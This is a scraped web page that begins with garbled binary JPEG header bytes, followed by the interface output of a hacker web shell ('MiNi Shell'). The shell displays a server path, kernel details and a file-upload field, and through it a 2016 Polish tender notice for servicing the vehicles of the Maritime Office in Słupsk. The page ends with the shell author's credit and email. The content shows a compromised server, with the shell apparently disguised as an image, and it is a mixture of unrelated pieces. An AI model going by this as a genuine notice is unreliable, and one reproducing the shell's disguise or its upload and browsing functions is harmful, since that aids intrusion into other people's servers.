JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160513/121226-N-2016.html

<p class="kh_header"><b>Słupsk: Usługa serwisowania i naprawy pojazdów 
Urzędu Morskiego w Słupsku</b><br>
<b>Numer ogłoszenia: 121226 - 2016; data zamieszczenia: 13.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Morski w Słupsku , Al. Sienkiewicza 18, 76-200 Słupsk, woj. pomorskie, tel. 059 8428406, faks 059 8428406, 8412443.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umsl.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa serwisowania i naprawy pojazdów 
Urzędu Morskiego w Słupsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa serwisowania i naprawy pojazdów samochodowych Urzędu Morskiego w Słupsku.
2. Niniejsze zamówienie zostało podzielone na 7 zadań:
Zadanie nr 1:Serwisowanie i naprawa pojazdów samochodowych marki Kia, Iveco, Nissan, Ford, w łącznej szacunkowej ilości 228 roboczogodzin: 
a)Kia Carnival, rok produkcji 2005 - 1 pojazd,
b)Kia Carnival, rok produkcji 2007 - 1 pojazd,
c)Iveco Daily, rok produkcji 2009 - 1 pojazd,
d)Nissan Almera, rok produkcji 2004 - 1 pojazd,
e)Nissan Pickup, rok produkcji 2005 - 1 pojazd,
f)Ford Tranzit, rok produkcji 1997 - 1 pojazd;
Zadanie nr 2:Serwisowanie i naprawa pojazdów samochodowych marki Fiat, Isuzu, Ssangyong, w łącznej szacunkowej ilości 330 roboczogodzin:
a)Fiat Ducato, rok produkcji 2011 - 1 pojazd,
b)Fiat Punto, rok produkcji 2012 - 4 pojazdy,
c)Isuzu, rok produkcji 2012 - 4 pojazdy,
d)Ssangyong Aktion Sport rok produkcji 2007 - 1 pojazd,
e)Fiat Skudo rok produkcji 2014 - 1 pojazd.
Zadanie nr 3:Serwisowanie i naprawa pojazdów samochodowych marki Skoda i VW, w łącznej szacunkowej ilości 200 roboczogodzin:
a)Skoda Superb, rok produkcji 2008 - 1 pojazd,
b)Skoda Rapid, rok produkcji 2014 - 1 pojazd,
c)VW Cady, rok produkcji 2007 - 1 pojazd,
d)VW Transporter 7HK, rok produkcji 2007 - 1 pojazd,
e)VW Transporter, rok produkcji 2002 - 1 pojazd; 
Zadanie nr 4:Serwisowanie i naprawa pojazdów marki Dresel, Yamaha, Honda, w łącznej szacunkowej ilości 266 roboczogodzin:
a)Dresel Y 9 Y55-F, rok produkcji 2012 - 1 pojazd,
b)Dresel Y 9 Y55-F, rok produkcji 2011 - 2 pojazdy,
c)Yamaha Rhino R, rok produkcji 2008 - 1 pojazd,
d)Yamaha Grizzli 450, rok produkcji 2007 rok - 1 pojazd,
e)Yamaha Rhino ESX, rok produkcji 2008 - 1 pojazd,
f)Honda TRX, rok produkcji 2001 - 1 pojazd.
Zadanie nr 5:Serwisowanie i naprawa pojazdów marki Yamaha, Dresel, w łącznej szacunkowej ilości 228 roboczogodzin:
a)Yamaha Grizzly 450, rok produkcji 2007 - 2 pojazdy;
b)Dresel MTC Y 9 Y55-F, rok produkcji 2011 - 2 pojazdy,
c)Yamaha YFM 700 C, rok produkcji 2008- 1 pojazd,
d)Yamaha Rhino RS, rok produkcji 2008 - 1 pojazd.
Zadanie nr 6:Serwisowanie i naprawa pojazdów marki Star, w łącznej szacunkowej ilości 160 roboczogodzin:
a)Star 266, rok produkcji 1993 - 1 pojazd,
b)Star 266, rok produkcji 1986 - 1 pojazd,
c)Star 266, rok produkcji 1983 - 1 pojazd,
d)Star 944, rok produkcji 2000 - 1 pojazd. 
Zadanie nr 7:Serwisowanie i naprawa pojazdów marki Ursus, AGT, MTZ, w łącznej szacunkowej ilości 
280 roboczogodzin:
a)Ciągnik Ursus 1614, rok produkcji 2000 - 1 pojazd,
b)Ciągnik AGT 836, rok produkcji 2008 - 1 pojazd,
c)Ciągnik MTZ 320A, rok produkcji 2002 - 1 pojazd,
d)Ciągnik Ursus 1134, rok produkcji 1992 - 1 pojazd,
e)Ciągnik Ursus 1014, rok produkcji 1999 - 1 pojazd,
f)Ciągnik AGT 836, rok produkcji 2008 - 1 pojazd,
g)Ciągnik Ursus, rok produkcji 1999 -  1 pojazd,
h)Ciągnik AGT, rok produkcji 836 - 1 pojazd. 
3.Szczegółowe dane pojazdów, wyszczególnionych w każdym zadaniu, zostały opisane w załączniku nr 7 do SIWZ.
4.Zakres usług serwisowania i napraw obejmuje: 
a)okresowy przegląd pogwarancyjny pojazdów, wynikający z tabel przebiegu pojazdów danej marki - wszystkie układy przedstawionego pojazdu;
b)sprawdzenie stanu technicznego pojazdów;
c)naprawy pojazdów wynikające z przeglądów okresowych, awarii lub szkód powypadkowych,
d)dla zadań 1-3 sezonową wymianę opon i wyważanie kół.
2.5.Podana w pkt. 2.2. SIWZ szacunkowa ilość roboczogodzin w każdym zadaniu ma charakter orientacyjny, określony na podstawie aktualnej wiedzy Zamawiającego w zakresie potrzeb serwisowania i naprawy pojazdów w okresie 24 miesięcy. Rozliczenie za wykonane usługi nastąpi na podstawie katalogowej ilości roboczogodzin przewidywanej na daną usługę serwisowania lub naprawy danej marki pojazdu.
6.Zakład naprawczy, w którem będą świadczone usługi winien znajdować się w Słupsku lub w Koszalinie lub w odległości 70 km od tych miejscowości. 
7. W zakresie zadań 1-3 Zamawiający wymaga, aby zakład naprawczy, w którym świadczone będą usługi, posiadał autoryzację na naprawy mechaniczne i elektryczne dla co najmniej jednej marki pojazdu, ujętej w danym zadaniu. Celem Zamawiającego jest zapewnienie pełnej sprawności użytkowanych pojazdów poprzez uzyskanie ich obsługi technicznej i napraw bieżących na właściwym, wysokim poziomie. Standard usług Zamawiający określa poprzez obiektywny czynnik, jakim jest autoryzacja producenta pojazdu dla zakładu świadczącego naprawy i obsługę. Przy czym, by nie zawężać zasad konkurencji, Zamawiający postawił wymóg posiadania autoryzacji producenta minimum jednej marki pojazdu objętej danym zadaniem. W opinii Zamawiającego, wymaganie dotyczące standardu świadczenia usługi jest uzasadnione i adekwatne do jego potrzeb, które wymagają bezawaryjności pojazdów. 
8. Materiały eksploatacyjne i części zamienne użyte w trakcie przeglądów i napraw muszą być fabrycznie nowe i zgodne z zaleceniami producenta danej marki. 
2.9.	Każdorazowo zakres naprawy, szacunkowy czas jej trwania w oparciu o czasochłonność wykonania usługi przewidzianą przez producenta danej marki pojazdu, oraz szacunkowy koszt wykonania usługi (z uwzględnieniem ceny jednostkowej wynikającej ze złożonej oferty) będzie uzgodniony z przedstawicielem Zamawiającego.
2.10.	  Opis przedmiotu zamówienia za pomocą kodów CPV Wspólnego Słownika Zamówień:
50112000-3 - usługi w zakresie napraw i konserwacji samochodów 
2.11.	Wynagrodzenie Wykonawcy za cały okres realizacji umowy nie może przekroczyć kwoty netto w zadaniach:
zadanie nr 1: 	60.000,00 zł netto
zadanie nr 2: 	69.000,00 zł netto
zadanie nr 3: 	54.000,00 zł netto
zadanie nr 4: 	44.000,00 zł netto
zadanie nr 5: 	37.000,00 zł netto
zadanie nr 6: 	33.000,00 zł netto
zadanie nr 7: 	33.000,00 zł netto
2.12.	Zamawiający dopuszcza składanie ofert częściowych.
2.13.	Zamawiający nie dopuszcza składania ofert wariantowych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości:
zadanie nr 1: 1.500,00 zł (jeden tysiąc pięćset złotych)
zadanie nr 2: 1.800,00 zł (jeden tysiąc osiemset złotych)
zadanie nr 3: 1.500,00 zł (jeden tysiąc pięćset złotych)
zadanie nr 4: 1.300,00 zł (jeden tysiąc trzysta złotych)
zadanie nr 5: 1.100,00 zł (jeden tysiąc sto złotych)
zadanie nr 6:  900,00 zł (dziewięćset złotych)
zadanie nr 7:  900,00 zł (dziewięćset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku - Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku - Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował minimum jednym zakładem naprawczym, w którym będą świadczone usługi, znajdującym się na terenie miasta Słupska lub miasta Koszalin lub w odległości 70 km od tych miejscowości</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku - Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku - Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - cena 1 Rbh stosowanej w rozliczeniu usługi - 30</li>
<li>3 - marża na części i materiały eksploatacyjne - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia istotnych zmian do treści zawartej umowy w stosunku do treści oferty w następującym zakresie:
1.wynagrodzenia należnego wykonawcy, w przypadku zmiany:
a)obowiązującej stawki podatku od towarów i usług,
b)wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, przy czym możliwość zmiany nie dotyczy zmiany minimalnego wynagrodzenia wprowadzonej rozporządzeniem Rady Ministrów z dnia 11 września 2014 r. w sprawie wysokości minimalnego wynagrodzenia za pracę w 2015 r. (Dz. U. 2014 poz. 1220);
c)zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,
- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę;
2.  zmniejszenie lub zwiększenie zakresu przedmiotu zamówienia - w przypadku likwidacji pojazdu objętego przedmiotem zamówienia lub zakup pojazdu, co konsekwentnie wpłynie na zmniejszenie bądź zwiększenie szacunkowej ilości roboczogodzin.  
3. zmiany lokalizacji zakładu naprawczego z zastrzeżeniem, że nowowskazany zakład naprawczy znajdować się będzie w mieście Słupsk lub mieście Koszalin bądź w odległości 70 km od tych miejscowości.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umsl.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Morski w Słupsku
Al. Sienkiewicza 18
76-200 Słupsk
pokój nr 22, II p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2016 godzina 10:00, miejsce: Urząd Morski w Słupsku
Al. Sienkiewicza 18
76-200 Słupsk
pokój nr 20- sekretariat, II p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com